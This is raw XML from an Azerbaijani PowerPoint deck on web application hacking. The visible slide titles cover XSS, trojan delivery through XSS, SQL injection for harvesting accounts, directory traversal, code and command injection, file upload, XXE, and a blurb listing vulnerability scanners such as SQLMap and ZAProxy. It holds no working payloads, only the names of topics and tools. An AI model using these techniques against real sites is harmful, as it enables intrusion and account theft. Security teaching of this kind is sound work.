              <a:rPr lang="en-US" sz="7200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>və</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="7200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="7200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sistemə</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="7200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="7200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>daxil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="7200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="7200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>olma</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="7200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="3145731" name="Straight Connector 12"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noGrp="1" noRot="1" noChangeAspect="1" noMove="1" noResize="1" noEditPoints="1" noAdjustHandles="1" noChangeArrowheads="1" noChangeShapeType="1"/>
          </p:cNvCxnSpPr>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8642" name="Freeform 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noMove="1" noResize="1" noEditPoints="1" noAdjustHandles="1" noChangeArrowheads="1" noChangeShapeType="1" noTextEdit="1"/>
          </p:cNvSpPr>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48641"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="700"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1048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1" grpId="0"/>
    </p:bldLst>
  </p:timing>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Mövzusu">
  <a:themeElements>
    <a:clrScheme name="Ofi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s">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2992</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Geniş ekran</PresentationFormat>
  <Paragraphs>142</Paragraphs>
  <Slides>75</Slides>
  <Notes>2</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75</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="81" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Avenir Next LT Pro</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Open Sans</vt:lpstr>
      <vt:lpstr>Sitka Banner</vt:lpstr>
      <vt:lpstr>HeadlinesVTI</vt:lpstr>
      <vt:lpstr>Veb Səhifələrində hakinq etmək üçün hər hakinq də olduğu kimi öncədən bu veb səhifə haqqında məlumat toplamaq lazımdırki, həmin səhifədə hər hansı bir təhlükəsizlik boşluğunun mövcudluğunu aşkar olunsun.  Bunun üçündə bəzi programlar mövzuddur.  WAES – Linux Əməliyyat sistemləri üçün inkişaf ettirilmiş bir və içərisində 10-a yaxın programı birləşdirərək veb səhifəsi haqqında məlumat toplayan programdır. Github vəsitəsiylə yükləyə bilərik.  RAPİDSCAN – Linux Əməliyyat sistemləro üçün inkişaf etdirilmiş və İçərisindəki 10 a yaxın program vasitəsiylə 80 fərqli axtarma üsulu ilə bizə hədəf veb səhifəsi haqqında ətraflı məlumat verir.Github vasitəsiylə yükləyə bilərik.  WAPITI – Hədəf veb səhifəsində “Qara Qutu” üsulu ilə təhlükəsizlik açığı axtaran programdır yəni hədəf səhifənin linkində fərqli parametrləri yoxlayır və bunların verdi reaksıyalara uyğun nəticə çıxarır.Github vasiyəsiylə yükləyə bilərik.  XSSPWN – Veb səhifələrdə XSS açığının aşkarlanması üçün fərqli payload kodları istifadə edərək bu açığn olub olmadığını tapır.  VOOKİ – Həm windows  həmdə linux əməliyyat sistemlərində istifadə edilə bilən və pulsuz olan bir programdır.Məlumat toplamaq , təhlükəsislik açıqlarını tapmaq və.s üçündür və Proxy funksiyası ilə fərqli İP lər işlədərək Veb səhifəsində təhlükəsizlik açığı aşkarlanması üçün axtarışlar verə bilir.  ZAPROXY – Dünyada Ən Məşhur Veb Səhifələr üçün təhlükəsizlik açığı axtaran programdır 2 növ axtarış növü var “Automatic” və ”Manuel”  Automatic bölməsi veb səhifədəki giriş olmadan icazə verilən səhifələrdə axtarış edir ,Manuel bölməsi ilə istifadəçi girişi olunan səhifələrdə əl ilə giriş etdikdən sonra axtarış edir.  SKİPFİSH – Google tərəfindən inkişaf etdirilən bir programdır. Hədəf səhifəni axtarış verdikdə tapılan məlumatları sistemdə qovluğa yazır və bittikdən sonra görmək üçün .html uzantılı fayla giriş edirik.  Bu programlardan əlavə : UNISCAN-GUI , SQLMAP , NESSUS , OPENVAS , LFİSUİTE və.s nümunə vermək olar. </vt:lpstr>
      <vt:lpstr>PowerPoint Sunusu</vt:lpstr>
      <vt:lpstr>PowerPoint Sunusu</vt:lpstr>
      <vt:lpstr>XSS     Təhlükəsizlil açığı</vt:lpstr>
      <vt:lpstr>PowerPoint Sunusu</vt:lpstr>
      <vt:lpstr>PowerPoint Sunusu</vt:lpstr>
      <vt:lpstr>PowerPoint Sunusu</vt:lpstr>
      <vt:lpstr>PowerPoint Sunusu</vt:lpstr>
      <vt:lpstr>XSS açığı ilə hədəfə trojan yüklətmə və sistemə daxil olma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SQL Təhlükəsizlik Açığı nədir?  ﻿Sql açığı ilə mysqldəki məlumatları çəkmək,silmək editləmək və s. əməliyyatlar həyata keçirtmək olar. Sql açıqlarının yaranmasının səbəbləri mysqlə daxil olan və ya mysqldən çıxan məlumatların yoxlanmadan süzgəcdən keçirilmədən əmrləri həyata keçirildiyi üçün baş verir </vt:lpstr>
      <vt:lpstr>SQL açığı ilə Web Saytdan Hesab toplama          1)Programsız     2)Programla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Directory Traversal               Təhlükəsizlik açığı</vt:lpstr>
      <vt:lpstr>PowerPoint Sunusu</vt:lpstr>
      <vt:lpstr>PowerPoint Sunusu</vt:lpstr>
      <vt:lpstr>PowerPoint Sunusu</vt:lpstr>
      <vt:lpstr>PowerPoint Sunusu</vt:lpstr>
      <vt:lpstr>Code İnjection       Təhlükəsizlik açığı</vt:lpstr>
      <vt:lpstr>PowerPoint Sunusu</vt:lpstr>
      <vt:lpstr>PowerPoint Sunusu</vt:lpstr>
      <vt:lpstr>PowerPoint Sunusu</vt:lpstr>
      <vt:lpstr>Command İnjection         Təhlükəsizlik açığı</vt:lpstr>
      <vt:lpstr>PowerPoint Sunusu</vt:lpstr>
      <vt:lpstr>PowerPoint Sunusu</vt:lpstr>
      <vt:lpstr>PowerPoint Sunusu</vt:lpstr>
      <vt:lpstr>PowerPoint Sunusu</vt:lpstr>
      <vt:lpstr>LDAP Servis    Təhlükəsizlik açığı nədir?  </vt:lpstr>
      <vt:lpstr>LDAP Servis    Təhlükəsizlik açığı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File Upload     Təhlükəsizlik açığı</vt:lpstr>
      <vt:lpstr>PowerPoint Sunusu</vt:lpstr>
      <vt:lpstr>PowerPoint Sunusu</vt:lpstr>
      <vt:lpstr>PowerPoint Sunusu</vt:lpstr>
      <vt:lpstr>PowerPoint Sunusu</vt:lpstr>
      <vt:lpstr>PowerPoint Sunusu</vt:lpstr>
      <vt:lpstr>PowerPoint Sunusu</vt:lpstr>
      <vt:lpstr>PowerPoint Sunusu</vt:lpstr>
      <vt:lpstr>XML , XXE   təhlükəsizlik açığı</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Təqdimatı</dc:title>
  <dc:creator>Fuad Qudayev</dc:creator>
  <cp:lastModifiedBy>Fuad Qudayev</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-05-08T07:05:03Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-06-01T08:37:17Z</dcterms:modified>
</cp:coreProperties>
</file>